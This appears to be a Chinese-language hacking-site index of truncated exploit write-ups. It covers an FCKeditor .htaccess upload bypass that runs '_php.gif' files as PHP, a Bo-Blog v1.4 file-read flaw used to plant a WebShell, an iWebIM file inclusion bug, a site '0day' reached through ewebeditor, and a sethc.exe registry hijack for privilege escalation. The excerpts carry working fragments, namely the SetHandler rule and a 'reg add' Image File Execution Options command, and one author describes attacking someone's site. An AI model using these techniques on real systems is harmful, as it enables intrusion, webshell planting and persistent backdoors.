-
网上刚报的fck的漏洞,利用htaccess
1.create a htaccess file:code:<FilesMatch "_php.gif">SetHandler application/x-httpd-php</FilesMatch&g...
-
Bo-Blog v1.4 单用户版分类列表文件读取漏洞+拿WebShell
这个是前几天,干某人站,发现用的这套程序,于是就下了一套研究(坑爹啊,04年的Blog程序现在居然还有人用,不过现在这位同学换了Blog程序,发出来也不怕万人轮了),挖了几个漏洞,这是其中一个,这套程序除了这个漏洞,还有各种XSS(取Coo...
-
iWebIM 文件包含漏洞
By:tojen Site:www.jooyea.net Name:iWebIM 测试其他站点的时候遇到这个么东西,下代码看了下,存在文件包含漏洞。 在文件includes.php最后几行:...
-
传信网络网站源码0day漏洞
此网站源码 超牛.防注入 上传很难突破.后台system/login.asp也是进了ewebeditor也是防密码的好多大牛都很难搞的下此源码经过社工才搞到的.进了后台发现有个ewebeditor所以了写个通杀漏洞Google 搜索inur...
-
命令行下操作注册表劫持sethc提权
经典的利用劫持替换sethc.exe 的例子:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\seth...
